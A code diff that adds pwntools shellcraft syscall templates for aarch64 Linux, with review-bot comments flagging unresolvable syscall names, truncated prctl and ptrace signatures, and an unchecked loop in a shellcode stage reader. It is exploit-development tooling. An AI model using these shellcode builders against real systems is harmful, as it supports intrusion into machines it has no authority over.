diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm new file mode 100644 index 000000000..e750a540f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mremap.asm b/pwnlib/shellcraft/templates/aarch64/linux/mremap.asm new file mode 100644 index 000000000..01c8abc26 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/msync.asm b/pwnlib/shellcraft/templates/aarch64/linux/msync.asm new file mode 100644 index 000000000..2906d3241 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/munlock.asm b/pwnlib/shellcraft/templates/aarch64/linux/munlock.asm new file mode 100644 index 000000000..9fd8f70a4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/munlock.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm b/pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm new file mode 100644 index 000000000..d5164dcbc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/munmap.asm b/pwnlib/shellcraft/templates/aarch64/linux/munmap.asm new file mode 100644 index 000000000..b3b2553f3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm b/pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm new file mode 100644 index 000000000..fcb9f293c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/nice.asm b/pwnlib/shellcraft/templates/aarch64/linux/nice.asm new file mode 100644 index 000000000..283f6ff5e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/open.asm b/pwnlib/shellcraft/templates/aarch64/linux/open.asm new file mode 100644 index 000000000..c80d005ef --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/openat.asm b/pwnlib/shellcraft/templates/aarch64/linux/openat.asm new file mode 100644 index 000000000..6f7cb20ce --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pause.asm b/pwnlib/shellcraft/templates/aarch64/linux/pause.asm new file mode 100644 index 000000000..7f4e4d99a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pause.asm 
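Review bot: `${syscall('SYS_open', file, oflag, vararg)}` in the new open.asm relies on a constant that the arm64 kernel does not define — aarch64 uses the asm-generic syscall table, which has only `openat` and no `open` — so unless pwnlib's aarch64 constants module aliases `SYS_open`, this template will fail to resolve at assembly time. The wrapper should forward to the real syscall, `${syscall('SYS_openat', 'AT_FDCWD', file, oflag, vararg)}`, or the docstring should state that it is a convenience over openat. The template's `vararg` is the `mode` argument; naming it `mode` in `<%page args>` and the docstring would make that clearer, at the cost of a parameter rename.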
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pipe.asm b/pwnlib/shellcraft/templates/aarch64/linux/pipe.asm new file mode 100644 index 000000000..7ee9244d9 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm b/pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm new file mode 100644 index 000000000..000e9d4ac --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/poll.asm b/pwnlib/shellcraft/templates/aarch64/linux/poll.asm new file mode 100644 index 000000000..9b7137e77 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm b/pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm new file mode 100644 index 000000000..81dc1d07c 
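Review bot: `${syscall('SYS_pipe', pipedes)}` in pipe.asm uses a syscall number that the arm64 generic table does not provide; aarch64 only has `pipe2`, so this constant presumably will not resolve unless the aarch64 constants module defines it. The template can be made to work on this arch by emitting `${syscall('SYS_pipe2', pipedes, 0)}`, which is exactly what glibc does for `pipe(2)` there. The same gap appears to exist for the `pause` template on this line (arm64 has no `pause`; glibc builds it on `ppoll`).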
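Review bot: `${syscall('SYS_poll', fds, nfds, timeout)}` in poll.asm names a syscall that is not in the arm64 table, where only `ppoll` exists. Mapping it is not a one-line change, because `ppoll` takes a `struct timespec *` rather than a millisecond `int`, so the template would have to build a timespec on the stack (or accept only `timeout == -1`, passing a NULL pointer) before calling `SYS_ppoll` with a NULL sigmask. If that is out of scope, the docstring should at least warn that this template is not usable on aarch64 as generated.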
--- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/prctl.asm b/pwnlib/shellcraft/templates/aarch64/linux/prctl.asm new file mode 100644 index 000000000..1f5287832 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="option, vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pread.asm b/pwnlib/shellcraft/templates/aarch64/linux/pread.asm new file mode 100644 index 000000000..585463371 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/preadv.asm b/pwnlib/shellcraft/templates/aarch64/linux/preadv.asm new file mode 100644 index 000000000..15b2ad4f5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/preadv.asm 
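Review bot: `<%page args="option, vararg"/>` in prctl.asm collapses prctl's four trailing arguments into a single `vararg`, so `${syscall('SYS_prctl', option, vararg)}` only ever loads x0 and x1 and a caller cannot set arg3..arg5 (needed, for example, by `PR_SET_SECCOMP`/`PR_SET_NO_NEW_PRIVS` combinations or `PR_SET_NAME` with extra flags). The signature appears to have been generated from the libc prototype `int prctl(int option, ...)` rather than the kernel's five-argument entry point. Suggest `<%page args="option, arg2=0, arg3=0, arg4=0, arg5=0"/>` and `${syscall('SYS_prctl', option, arg2, arg3, arg4, arg5)}`, which keeps existing two-argument callers working.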
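Review bot: `${syscall('SYS_pread', fd, buf, nbytes, offset)}` in pread.asm uses a constant name that, as far as the kernel headers go, does not exist on aarch64 — the generic table calls it `pread64` (`__NR_pread64`), and `pread` is only the libc wrapper name. Unless the aarch64 constants module provides a `SYS_pread` alias, the template should emit `${syscall('SYS_pread64', fd, buf, nbytes, offset)}`; the docstring's `offset(off_t)` is then a 64-bit value in x3, which is fine on this arch.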
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm b/pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm new file mode 100644 index 000000000..87e295a14 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/profil.asm b/pwnlib/shellcraft/templates/aarch64/linux/profil.asm new file mode 100644 index 000000000..4e199cd0f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm b/pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm new file mode 100644 index 000000000..b8999ac7f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm 
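Review bot: `${syscall('SYS_profil', sample_buffer, size, offset, scale)}` in profil.asm refers to a syscall that does not exist on Linux on any architecture — `profil(3)` is a libc routine implemented with `setitimer` and `SIGPROF` — so this constant can never resolve and the template is dead on arrival. It looks like a by-product of generating templates from libc prototypes rather than from the kernel's syscall table; it should be dropped, or its docstring should say explicitly that it is not a system call. The neighbouring `preadv` and `prlimit64` templates on this line do correspond to real arm64 syscalls.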
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm new file mode 100644 index 000000000..7278444a4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm b/pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm new file mode 100644 index 000000000..4b29a3bca --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm b/pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm new file mode 100644 index 000000000..68791c21c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm 
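Review bot: `<%page args="request, vararg"/>` in ptrace.asm loses three of ptrace's four arguments: the kernel entry point is `ptrace(request, pid, addr, data)`, but `${syscall('SYS_ptrace', request, vararg)}` only populates x0 and x1, so a caller cannot express `PTRACE_ATTACH` on a given pid, let alone `PTRACE_POKETEXT` with an address and data word. The signature appears to come from the libc prototype `long ptrace(enum __ptrace_request, ...)`. Suggest `<%page args="request, pid=0, addr=0, data=0"/>` and `${syscall('SYS_ptrace', request, pid, addr, data)}`, with the docstring listing all four; existing callers passing a second positional argument keep working since it now lands in `pid`.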
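Review bot: `${syscall('SYS_pwrite', fd, buf, n, offset)}` in pwrite.asm uses the libc wrapper's name rather than the kernel's; on aarch64 the syscall is `pwrite64` (`__NR_pwrite64`), so `SYS_pwrite` will presumably not resolve unless the aarch64 constants module aliases it. Emitting `${syscall('SYS_pwrite64', fd, buf, n, offset)}` avoids the dependency on such an alias. The `putpmsg` template on the same line has a similar problem: it is a STREAMS stub that the arm64 table does not carry at all.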
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/read.asm b/pwnlib/shellcraft/templates/aarch64/linux/read.asm new file mode 100644 index 000000000..810091c5e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/read.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Invokes the syscall read. See 'man 2 read' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + + + ${syscall('SYS_read', fd, buf, nbytes)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readahead.asm b/pwnlib/shellcraft/templates/aarch64/linux/readahead.asm new file mode 100644 index 000000000..47af56a5b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/readdir.asm new file mode 100644 index 000000000..6ccfa6d5d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} 
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/readlink.asm new file mode 100644 index 000000000..6f2b75e3c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm new file mode 100644 index 000000000..2ef56ada7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readn.asm b/pwnlib/shellcraft/templates/aarch64/linux/readn.asm new file mode 100644 index 000000000..d68e270de --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readn.asm @@ -0,0 +1,23 @@ +<% + from pwnlib.shellcraft.aarch64.linux import read + from pwnlib.shellcraft.aarch64 import setregs + from pwnlib.shellcraft import common +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Reads exactly nbytes bytes from file descriptor fd into the buffer buf. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + +<% +readn_loop = common.label('readn_loop') +%> + ${setregs({'x3': buf, 'x4': nbytes})} +${readn_loop}: + ${read(fd, 'x3', 'x4')} + add x3, x3, x0 + subs x4, x4, x0 + bne ${readn_loop} 
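Review bot: `${syscall('SYS_readlink', path, buf, len)}` in readlink.asm names a syscall the arm64 generic table does not have — only `readlinkat` exists there — so unless pwnlib's aarch64 constants define `SYS_readlink` the template will not assemble on this arch. The `readlinkat` template added on this same line is the real one; `readlink` should forward to it as `${syscall('SYS_readlinkat', 'AT_FDCWD', path, buf, len)}`, matching what glibc does.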
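Review bot: The loop in readn.asm never checks the result of `${read(fd, 'x3', 'x4')}`, so a 0 return (EOF, peer closed the socket) leaves x3 and x4 unchanged and the `subs x4, x4, x0` / `bne ${readn_loop}` pair spins forever, while a negative return (-errno in x0) moves x3 *backwards* and grows x4, so the next read scribbles below `buf` instead of terminating. Since this is shellcode that typically reads a stage from an attacker-controlled fd, a short or closed connection should stop the loop rather than hang or corrupt memory. Adding a `cmp x0, #0` / `b.le` exit before the pointer arithmetic fixes both cases at the cost of two instructions and one label; note also that `fd` is re-evaluated every iteration, so presumably passing it in `x0` (clobbered by the return value) or in `x3`/`x4` would break on the second pass — worth a line in the docstring.

```asm
<%
readn_loop = common.label('readn_loop')
readn_done = common.label('readn_done')
%>
    ${setregs({'x3': buf, 'x4': nbytes})}
${readn_loop}:
    ${read(fd, 'x3', 'x4')}
    /* read returns 0 at EOF and -errno on error: stop instead of
       spinning forever or walking x3 below buf */
    cmp x0, #0
    b.le ${readn_done}
    add x3, x3, x0
    subs x4, x4, x0
    bne ${readn_loop}
${readn_done}:
```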
diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readv.asm b/pwnlib/shellcraft/templates/aarch64/linux/readv.asm new file mode 100644 index 000000000..f8b4cfdfe --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recv.asm b/pwnlib/shellcraft/templates/aarch64/linux/recv.asm new file mode 100644 index 000000000..a79f5bca8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm b/pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm new file mode 100644 index 000000000..3f2d12f85 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm new file mode 100644 index 000000000..9ebf14a94 --- /dev/null 
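Review bot: `${syscall('SYS_recv', fd, buf, n, flags)}` in recv.asm refers to a syscall that does not exist in the arm64 table (nor on other 64-bit Linux ports, where `recv` is a libc wrapper); the kernel entry point is `recvfrom` with NULL address arguments. Unless the aarch64 constants module aliases `SYS_recv`, the template should emit `${syscall('SYS_recvfrom', fd, buf, n, flags, 0, 0)}`, which is what the `recvfrom` template added right after it already supports.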
+++ b/pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm new file mode 100644 index 000000000..ae86d2d20 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm new file mode 100644 index 000000000..608c5324b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/rename.asm b/pwnlib/shellcraft/templates/aarch64/linux/rename.asm new file mode 100644 index 000000000..807a26986 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/rename.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/renameat.asm b/pwnlib/shellcraft/templates/aarch64/linux/renameat.asm new file mode 100644 index 000000000..ea6874ce5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm new file mode 100644 index 000000000..4fd59e542 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..b884b9c3e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} 
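Review bot: `${syscall('SYS_rename', old, new)}` in rename.asm uses a syscall number that the arm64 generic table omits; only `renameat` is available there, so the constant will presumably fail to resolve unless aliased by the aarch64 constants module. The `renameat` template added on this same line is the native one, and `rename` should forward to it: `${syscall('SYS_renameat', 'AT_FDCWD', old, 'AT_FDCWD', new)}`. The parameter name `new` is also a Python keyword-lookalike that reads oddly in the mako `<%page args>`; `oldpath`/`newpath` would be clearer if a rename is acceptable.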
